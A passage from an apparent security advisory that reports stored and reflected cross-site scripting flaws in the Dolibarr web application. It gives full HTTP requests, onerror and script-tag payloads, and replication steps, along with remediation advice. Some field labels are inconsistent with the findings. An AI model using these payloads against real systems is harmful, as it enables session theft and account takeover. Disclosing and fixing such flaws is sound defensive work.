Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (Stored) Severity: Critical URL: http://localhost/dolibarr/user/fiche.php Affected Users: Authenticated user and admins Issue details: The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bea68"><img src=a onerror=alert(1)>13228 was submitted in the email parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------89552749915619 Content-Length: 2023 -----------------------------89552749915619 Content-Disposition: form-data; name="token" 4e3018ee618da95bccb8c38845a4f027 -----------------------------89552749915619 Content-Disposition: form-data; name="action" update -----------------------------89552749915619 Content-Disposition: form-data; name="entity" 1 -----------------------------89552749915619 Content-Disposition: form-data; name="lastname" test -----------------------------89552749915619 Content-Disposition: form-data; name="photo"; filename="" Content-Type: application/octet-stream -----------------------------89552749915619 Content-Disposition: form-data; name="firstname" test1 -----------------------------89552749915619 Content-Disposition: form-data; name="job" -----------------------------89552749915619 Content-Disposition: form-data; name="login" test -----------------------------89552749915619 Content-Disposition: form-data; name="password" 123qwe,./ -----------------------------89552749915619 Content-Disposition: form-data; name="admin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="superadmin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="office_phone" -----------------------------89552749915619 Content-Disposition: form-data; name="user_mobile" -----------------------------89552749915619 Content-Disposition: form-data; name="office_fax" -----------------------------89552749915619 Content-Disposition: form-data; name="email" bea68"><img src=a onerror=alert(1)>13228 -----------------------------89552749915619 Content-Disposition: form-data; name="signature" -----------------------------89552749915619 Content-Disposition: form-data; name="fk_user" -1 -----------------------------89552749915619 Content-Disposition: form-data; name="accountancy_code" -----------------------------89552749915619 Content-Disposition: form-data; name="save" Save -----------------------------89552749915619-- Affected parameter(s): email Steps to replicate: 1. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". 2. Click on modify to modify the user details 3. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 4. After starting tamper data addon, click on save to save the user details and intercept the request 5. Manipulate email parameter value with payload bea68"><img src=a onerror=alert(1)>13228 and submit the request and see the output in browser 6. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (Stored) Severity: Critical URL: http://localhost/dolibarr/user/fiche.php Affected Users: Authenticated user and admins Issue details: The value of the firstname request parameter is copied into the HTML document as plain text between tags. The payload 60b01<img src=a onerror=alert(1)>f17dd was submitted in the firstname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------89552749915619 Content-Length: 2023 -----------------------------89552749915619 Content-Disposition: form-data; name="token" 4e3018ee618da95bccb8c38845a4f027 -----------------------------89552749915619 Content-Disposition: form-data; name="action" update -----------------------------89552749915619 Content-Disposition: form-data; name="entity" 1 -----------------------------89552749915619 Content-Disposition: form-data; name="lastname" test -----------------------------89552749915619 Content-Disposition: form-data; name="photo"; filename="" Content-Type: application/octet-stream -----------------------------89552749915619 Content-Disposition: form-data; name="firstname" test160b01<img src=a onerror=alert(1)>f17dd -----------------------------89552749915619 Content-Disposition: form-data; name="job" -----------------------------89552749915619 Content-Disposition: form-data; name="login" test -----------------------------89552749915619 Content-Disposition: form-data; name="password" 123qwe,./ -----------------------------89552749915619 Content-Disposition: form-data; name="admin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="superadmin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="office_phone" -----------------------------89552749915619 Content-Disposition: form-data; name="user_mobile" -----------------------------89552749915619 Content-Disposition: form-data; name="office_fax" -----------------------------89552749915619 Content-Disposition: form-data; name="email" -----------------------------89552749915619 Content-Disposition: form-data; name="signature" -----------------------------89552749915619 Content-Disposition: form-data; name="fk_user" -1 -----------------------------89552749915619 Content-Disposition: form-data; name="accountancy_code" -----------------------------89552749915619 Content-Disposition: form-data; name="save" Save -----------------------------89552749915619-- Affected parameter(s): firstname Steps to replicate: 7. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". 8. Click on modify to modify the user details 9. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 10. After starting tamper data addon, click on save to save the user details and intercept the request 11. Manipulate firstname parameter value with payload test160b01<img src=a onerror=alert(1)>f17dd and submit the request and see the output in browser 12. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (Stored) Severity: Critical URL: http://localhost/dolibarr/user/fiche.php Affected Users: Authenticated user and admins Issue details: The value of the job request parameter is copied into the HTML document as plain text between tags. The payload 5db8e<img src=a onerror=alert(1)>a0840 was submitted in the job parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------89552749915619 Content-Length: 2023 -----------------------------89552749915619 Content-Disposition: form-data; name="token" 4e3018ee618da95bccb8c38845a4f027 -----------------------------89552749915619 Content-Disposition: form-data; name="action" update -----------------------------89552749915619 Content-Disposition: form-data; name="entity" 1 -----------------------------89552749915619 Content-Disposition: form-data; name="lastname" test -----------------------------89552749915619 Content-Disposition: form-data; name="photo"; filename="" Content-Type: application/octet-stream -----------------------------89552749915619 Content-Disposition: form-data; name="firstname" test1 -----------------------------89552749915619 Content-Disposition: form-data; name="job" 5db8e<img src=a onerror=alert(1)>a0840 -----------------------------89552749915619 Content-Disposition: form-data; name="login" test -----------------------------89552749915619 Content-Disposition: form-data; name="password" 123qwe,./ -----------------------------89552749915619 Content-Disposition: form-data; name="admin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="superadmin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="office_phone" -----------------------------89552749915619 Content-Disposition: form-data; name="user_mobile" -----------------------------89552749915619 Content-Disposition: form-data; name="office_fax" -----------------------------89552749915619 Content-Disposition: form-data; name="email" -----------------------------89552749915619 Content-Disposition: form-data; name="signature" -----------------------------89552749915619 Content-Disposition: form-data; name="fk_user" -1 -----------------------------89552749915619 Content-Disposition: form-data; name="accountancy_code" -----------------------------89552749915619 Content-Disposition: form-data; name="save" Save -----------------------------89552749915619-- Affected parameter(s): firstname Steps to replicate: 13. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". 14. Click on modify to modify the user details 15. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 16. After starting tamper data addon, click on save to save the user details and intercept the request 17. Manipulate job parameter value with payload 5db8e<img src=a onerror=alert(1)>a0840 and submit the request and see the output in browser 18. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (Stored) Severity: Critical URL: http://localhost/dolibarr/user/fiche.php Affected Users: Authenticated user and admins Issue details: The value of the lastname request parameter is copied into the HTML document as plain text between tags. The payload fc1dd<img src=a onerror=alert(1)>baf03 was submitted in the lastname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------89552749915619 Content-Length: 2023 -----------------------------89552749915619 Content-Disposition: form-data; name="token" 4e3018ee618da95bccb8c38845a4f027 -----------------------------89552749915619 Content-Disposition: form-data; name="action" update -----------------------------89552749915619 Content-Disposition: form-data; name="entity" 1 -----------------------------89552749915619 Content-Disposition: form-data; name="lastname" testfc1dd<img src=a onerror=alert(1)>baf03 -----------------------------89552749915619 Content-Disposition: form-data; name="photo"; filename="" Content-Type: application/octet-stream -----------------------------89552749915619 Content-Disposition: form-data; name="firstname" test1 -----------------------------89552749915619 Content-Disposition: form-data; name="job" -----------------------------89552749915619 Content-Disposition: form-data; name="login" test -----------------------------89552749915619 Content-Disposition: form-data; name="password" 123qwe,./ -----------------------------89552749915619 Content-Disposition: form-data; name="admin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="superadmin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="office_phone" -----------------------------89552749915619 Content-Disposition: form-data; name="user_mobile" -----------------------------89552749915619 Content-Disposition: form-data; name="office_fax" -----------------------------89552749915619 Content-Disposition: form-data; name="email" -----------------------------89552749915619 Content-Disposition: form-data; name="signature" -----------------------------89552749915619 Content-Disposition: form-data; name="fk_user" -1 -----------------------------89552749915619 Content-Disposition: form-data; name="accountancy_code" -----------------------------89552749915619 Content-Disposition: form-data; name="save" Save -----------------------------89552749915619-- Affected parameter(s): lastname Steps to replicate: 19. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". 20. Click on modify to modify the user details 21. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 22. After starting tamper data addon, click on save to save the user details and intercept the request 23. Manipulate lastname parameter value with payload fc1dd<img src=a onerror=alert(1)>baf03 and submit the request and see the output in browser 24. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/user/fiche.php Affected Users: Authenticated user and admins Issue details: The value of the login request parameter is copied into the HTML document as plain text between tags. The payload 99ecb<img src=a onerror=alert(1)>45a0d was submitted in the login parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------89552749915619 Content-Length: 2023 -----------------------------89552749915619 Content-Disposition: form-data; name="token" 4e3018ee618da95bccb8c38845a4f027 -----------------------------89552749915619 Content-Disposition: form-data; name="action" update -----------------------------89552749915619 Content-Disposition: form-data; name="entity" 1 -----------------------------89552749915619 Content-Disposition: form-data; name="lastname" test -----------------------------89552749915619 Content-Disposition: form-data; name="photo"; filename="" Content-Type: application/octet-stream -----------------------------89552749915619 Content-Disposition: form-data; name="firstname" test1 -----------------------------89552749915619 Content-Disposition: form-data; name="job" -----------------------------89552749915619 Content-Disposition: form-data; name="login" test99ecb<img src=a onerror=alert(1)>45a0d -----------------------------89552749915619 Content-Disposition: form-data; name="password" 123qwe,./ -----------------------------89552749915619 Content-Disposition: form-data; name="admin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="superadmin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="office_phone" -----------------------------89552749915619 Content-Disposition: form-data; name="user_mobile" -----------------------------89552749915619 Content-Disposition: form-data; name="office_fax" -----------------------------89552749915619 Content-Disposition: form-data; name="email" -----------------------------89552749915619 Content-Disposition: form-data; name="signature" -----------------------------89552749915619 Content-Disposition: form-data; name="fk_user" -1 -----------------------------89552749915619 Content-Disposition: form-data; name="accountancy_code" -----------------------------89552749915619 Content-Disposition: form-data; name="save" Save -----------------------------89552749915619-- Affected parameter(s): login Steps to replicate: 25. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". 26. Click on modify to modify the user details 27. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 28. After starting tamper data addon, click on save to save the user details and intercept the request 29. Manipulate login parameter value with payload 99ecb<img src=a onerror=alert(1)>45a0d and submit the request and see the output in browser 30. User logout inadequately and attack input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php Affected Users: All authenticated users Issue details: The value of the leftmenu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%35%33%38%31%37%29%3c%2f%73%43%72%49%70%54%3e was submitted in the leftmenu parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. HTTP request: GET /dolibarr/index.php?mainmenu=home&leftmenu=%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%35%33%38%31%37%29%3c%2f%73%43%72%49%70%54%3e&optioncss=print HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8082/dolibarr/index.php?mainmenu=home&leftmenu= Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Affected parameter(s): leftmenu Steps to replicate: 31. Open Dolibarr application in browser. 32. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 33. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 34. Manipulate leftmenu parameter value with payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e or submit http://localhost/dolibarr/index.php?mainmenu=home&leftmenu=%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e&optioncss=print in address bar and see the output in browser 35. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/viewimage.php Affected Users: All authenticated users Issue details: The value of the modulepart request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %3cscript%3ealert%2892207%29%3c%2fscript%3e was submitted in the modulepart parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. HTTP request: GET /dolibarr/viewimage.php?modulepart=userphoto%3cscript%3ealert%2892207%29%3c%2fscript%3e&entity=1&file=2%2F0%2F1234&cache=0 HTTP/1.0 Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=t2h9dudaj2qm7vp2skgkhpgs94 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: localhost Referer: http://localhost/dolibarr/user/fiche.php?id=2 Affected parameter(s): modulepart Steps to replicate: 36. Open Dolibarr application in browser. 37. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 38. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 39. Manipulate modulepart parameter value with payload %3cscript%3ealert%2892207%29%3c%2fscript%3e or submit http://localhost/dolibarr/viewimage.php?modulepart=userphoto%3cscript%3ealert%2892207%29%3c%2fscript%3e&entity=1&file=2%2F0%2F1234&cache=0 in address bar and see the output in browser 40. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/viewimage.php Affected Users: All authenticated users Issue details: The value of the file request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e was submitted in the modulepart parameter. This input was echoed unmodified in the application's response. This proof-of-concept 